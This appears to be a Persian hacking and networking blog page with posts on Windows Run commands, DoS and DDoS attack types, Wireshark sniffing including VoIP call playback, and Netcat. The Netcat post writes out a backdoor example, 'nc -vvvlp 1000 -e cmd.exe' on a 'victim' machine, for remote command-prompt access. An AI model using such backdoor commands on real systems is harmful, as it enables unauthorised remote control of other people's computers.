لیست کامل تمامی دستورات قابل اجرا از طریق Run :  

لیست کامل تمامی دستورات قابل اجرا از طریق Run :

نام برنامه اجراییدستور
Accessibility Controlsaccess.cpl
Add Hardware Wizardhdwwiz.cpl
Add/Remove Programsappwiz.cpl
Administrative Toolscontrol admintools
Automatic Updateswuaucpl.cpl
Bluetooth Transfer Wizardfsquirt
Calculatorcalc
Certificate Managercertmgr.msc
Character Mapcharmap
Check Disk Utilitychkdsk
Clipboard Viewerclipbrd
Command Promptcmd
Component Servicesdcomcnfg
Computer Managementcompmgmt.msc
Date and Time Propertiestimedate.cpl
DDE Sharesddeshare
Device Managerdevmgmt.msc
Direct X Control Panel - If Installeddirectx.cpl
Direct X Troubleshooterdxdiag
Disk Cleanup Utilitycleanmgr
Disk Defragmentdfrg.msc
Disk Managementdiskmgmt.msc
Disk Partition Managerdiskpart
Display Propertiescontrol desktop
Display Propertiesdesk.cpl
Display Properties w/Appearance Tab Preselectedcontrol color
Dr. Watson System Troubleshooting Utilitydrwtsn32
Driver Verifier Utilityverifier
Event Viewereventvwr.msc
File Signature Verification Toolsigverif
Findfastfindfast.cpl
Folders Propertiescontrol folders
Fontscontrol fonts
Fonts Folderfonts
Free Cell Card Gamefreecell
Game Controllersjoy.cpl
Group Policy Editor - XP Progpedit.msc
Hearts Card Gamemshearts
Iexpress Wizardiexpress
Indexing Serviceciadv.msc
Internet Propertiesinetcpl.cpl
IP Configuration - Display Connection Configurationipconfig /all
IP Configuration - Display DNS Cache Contentsipconfig /displaydns
IP Configuration - Delete DNS Cache Contentsipconfig /flushdns
IP Configuration - Release All Connectionsipconfig /release
IP Configuration - Renew All Connectionsipconfig /renew
IP Configuration - Refreshes DHCP & Re-Registers DNSipconfig /registerdns
IP Configuration - Display DHCP Class IDipconfig /showclassid
Java Control Panel - If Installedjpicpl32.cpl
Java Control Panel - If Installedjavaws
Keyboard Propertiescontrol keyboard
Local Security Settingssecpol.msc
Local Users and Groupslusrmgr.msc
Logs You Out Of Windowslogoff
Microsoft Chatwinchat
Minesweeper Gamewinmine
Mouse Propertiescontrol mouse
Mouse Propertiesmain.cpl
Network Connectionscontrol netconnections
Network Connectionsncpa.cpl
Network Setup Wizardnetsetup.cpl
Notepadnotepad
Nview Desktop Manager - If Installednvtuicpl.cpl
Object Packagerpackager
ODBC Data Source Administratorodbccp32.cpl
On Screen Keyboardosk
Opens AC3 Filter - If Installedac3filter.cpl
Password Propertiespassword.cpl
Performance Monitorperfmon.msc
Performance Monitorperfmon
Phone and Modem Optionstelephon.cpl
Power Configurationpowercfg.cpl
Printers and Faxescontrol printers
Printers Folderprinters
Private Character Editoreudcedit
Quicktime - If InstalledQuickTime.cpl
Regional Settingsintl.cpl
Registry Editorregedit
Registry Editorregedit32
Remote Desktopmstsc
Removable Storagentmsmgr.msc
Removable Storage Operator Requestsntmsoprq.msc
Resultant Set of Policy - XP Prorsop.msc
Scanners and Camerassticpl.cpl
Scheduled Taskscontrol schedtasks
Security Centerwscui.cpl
Servicesservices.msc
Shared Foldersfsmgmt.msc
Shuts Down Windowsshutdown
Sounds and Audiommsys.cpl
Spider Solitare Card Gamespider
SQL Client Configurationcliconfg
System Configuration Editorsysedit
System Configuration Utilitymsconfig
System File Checker Utility - Scan Immediatelysfc /scannow
System File Checker Utility - Scan Once At Next Bootsfc /scanonce
System File Checker Utility - Scan On Every Bootsfc /scanboot
System File Checker Utility - Return to Default Settingsfc /revert
System File Checker Utility - Purge File Cachesfc /purgecache
System File Checker Utility - Set Cache Size to size xsfc /cachesize=x
System Propertiessysdm.cpl
Task Managertaskmgr
Telnet Clienttelnet
User Account Managementnusrmgr.cpl
Utility Managerutilman
Windows Firewallfirewall.cpl
Windows Magnifiermagnify
Windows Management Infrastructurewmimgmt.msc
Windows System Security Toolsyskey
Windows Update Launcheswupdmgr
Windows XP Tour Wizardtourstart
Wordpadwrite

+ نوشته شده در یکشنبه نوزدهم آذر ۱۳۹۱ ساعت 11:53 توسط کاربر ارشد  | 

شناخت حمله DOS

وقتی هکر برای نفوذ به یک سیستم دیگه کاری از دستش بر نمیاد و میخواد به هر نحوه که شده همه چیز را داغون کنه به سراغ DOS و DDOS میره

این حمله با استفاده از ترفند هایی که داره سرویس را از کار می اندازه

انواع حمله داس :

Land attack :

یعنی پینگ با آدرس فرستنده و گیرنده یکسان. در این حالت این پینگ را زمانی که به دستگاه طرف بفرستید اینقدر خودش خودش را صدا میزند که سرگیجه میگیرد و از پای در میاد.

Smurf Attack:

هاست B از طرف A به همه اعضا سلام میکند و همه اعضا به A  جواب سلام میدهند و در صورت زیاد بودن تعداد این هاست ها A از کار می افتد.

DDOS به معنای داس توزیع شده است. یعنی نفوذگر ابتدا نرم افزاری را در بین قربانیان خود تحت عناوین مختلف توزیع کرده و روی سیستم آن ها نصب میکند (به این سیستم ها zambie میگویند ) و در روز و لحظه ی دلخواه فرمان حمله را صادر میکند.

مثلا در شبکه های اجتماعی تحت عنوان عکس برای فرد فایلی ارسال میکند که با اجرای آن سیستم فرد قربانی می گردد و کنترل سیستم فرد قربانی به دست نفوذگر خواهد افتاد.

در این حالت فرض کنید فرد نفوذگر هزاران سیستم را با این شگرد تحت کنترل خود داشته باشد و با صدور فرمان حمله به سمت سرور دلخواه آن سرور را از سرویس خارج نماید.

 اما چگونه باید تشخیص دهیم که سیستم ما آلوده شده و ما zambie شده ایم یا نه؟

یکی از راه های تشخیص آن استفاده از دستور netstat میباشد.

با فرمان netstat - n و مشاهده ی صفحه ی خروجی مشاهده میکنید که تعدادی ارتباط به مقاصد مختلف با پورت های مختلف روی سیستم شما باز است. در این بین اگر ارتباطی روی پورت 6667 روی سیستم شما باز باشد احتمال این که شما قربانی باشید فراوان است .

راه بستن این پورت را هم همه میدانیم.. فایر وال

+ نوشته شده در پنجشنبه نهم آذر ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

دستورات ویندوزی

دستور netsh

در محیط ویندوز به ما این امکان را میدهد که بتوانیم به واسطه کامند ها تنظیمات شبکه ای انجام دهیم.

دستور Powershell

در محیط ویندوز امکان اجرای دستورات لینوکسی را فراهم می آورد

دستور wmic

در محیط ویندوز  دستورات مدیریتی ویندوز را اجرا مینماید. اطلاعات بیشتر

برچسب‌ها: کامندهای ویندوزی, دستورات ویندوزی
+ نوشته شده در یکشنبه پنجم آذر ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

شنود در شبکه

واژه ی Sniff در واقع به معنای بو کشیدن است اما در شبکه به معنای شنود استفاده شده است.

یکی از روش های جمع آوری اطلاعات در شبکه شنود است.

شنود بر دو قسم است:

1- شنود فعال (Active sniff)

2- شنود غیر فعال (Passive sniff)


شنود فعال با استفاده از ابزار هایی نظیر cain انجام میگردد و قابل رد گیری است.

شنود غیر فعال یعنی این که لینکی به شبکه داشته باشیم و از طریق آن و قرار دادن کارت شبکه در حالت بی قید کلیه پکت های عبوری از داخل شبکه را رصد نماییم.

یکی از ابزارهای مفید در این زمینه Wireshark نام دارد. این ابزار برای رصد پکت های شبکه به کار میرود و کاربرد های مثبت بسیاری در زمینه عیب یابی شبکه و کشف حلمه و ... نیز دارد و به خاطر همین قابلیت های زیادی که دارد یکی از ابزار های دست هکر ها نیز به شمار میرود و شما به عنوان متخصص ضد هک باید با آن آشنا باشید.

وقتی برنامه را نصب کردید و آن را اجرا کردید صفحه ای مشابه صفحه زیر خواهید دید که با کلیک کردن بر روی نام  کارت شبکه خود ، رصد شروع خواهد شد.

 

و صفحه به شکل زیر تغییر خواهد کرد.

در این شکل مشاهده میکنید که انواع و اقسام پکت ها در حال عبور هستند که میتوان مبدا ، مقصد ، نوع بسته و محتوای آن را بررسی نمود.

و به این روش میتوان پکت های شبکه را شنود کرد . همچنین شنود ارتباطات VoIP هم با استفاده از یک sniffer، مثل بقیه انواع ترافیک شبکه قابل انجام است. برای تست شنود  مکالمات تلفنی که در بستر اینترنت با استفاده از سرویس Voice over IP در حال عبور است را با این ابزار شنود کرد:


1- نصب Wireshark

2- دانلود نمونه ترافیک حاوی VoIP از سایت Wireshark

3- اجرای Wireshark و باز کردن نمونه فایل فوق

4- انتخاب گزینه Voice Calls از منوی Telephony 

لیستی از تماس ها نشان داده می شود. در این مثال فقط اولین تماس حاوی مکالمه است.

5- اولین تماس را انتخاب و دکمه Player و بعد Decode را بزنید.

6- دو نمودار امواج صوتی مربوط به مکالمه (هر کدام برای یک طرف مکالمه) نشان داده می شود. با انتخاب check box زیر هر نمودار و زدن دکمه Play ، مکالمه مربوط به آن پخش میشود.

+ نوشته شده در یکشنبه بیست و هشتم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

NetCat یا چاقوی همه کاره ی سوئیسی

NetCat چیست؟

حتمن میدونید که در دنیا چاقو های همه کاره ی سوئیسی خیلی معروف هستند.

در دنیای شبکه هم از این چاقو ها وجود داره!

اما اسم این ابزار همه کاره Netcat هست

این ابزار هم از ابزار های جمع آوری اطلاعات هست و هم از ابزار های ارتقای سطح دسترسی

نت کت بر اساس یک نظر سنجی که در سایت insecure.org منتشر شد به عنوان دومین ابزار پرکاربرد هک انتخاب شده است.

فایل اجرایی این برنامه nc.exe میباشد. این فایل را در مسیر ویندوز کپی نموده و شروع به کار میکنیم.

nc -vvvlp 1000 دستور شروع به کار ابزار نت کت برای گوش دادن (Listening)

v = verbal یعنی گزارش دادن هر اتفاقی که می افتد

l = یعنی Listen

p = port number


NC -vvv 192.168.100.128 1000 برای وصل شدن به سیستم طرف مقابل با این دستور و آی پی 


مثال بک دور :

روی سیستم قربانی

nc -vvvlp 1000 -e cmd.exe

روی سیستم خودمان

nc -vvv 192.168.100.128 1000

به محض اجرای این دستور کامند پرامپت سیستم قربانی برای ما باز میشود

خوب اگر میخواهید با این ابزار آشنا بشید زحمت بکشید و این فایل را از اینجا دانلود کنید و بخوانید.

 

+ نوشته شده در چهارشنبه بیست و چهارم آبان ۱۳۹۱ ساعت 6:0 توسط کاربر ارشد  | 
مطالب جدیدتر مطالب قدیمی‌تر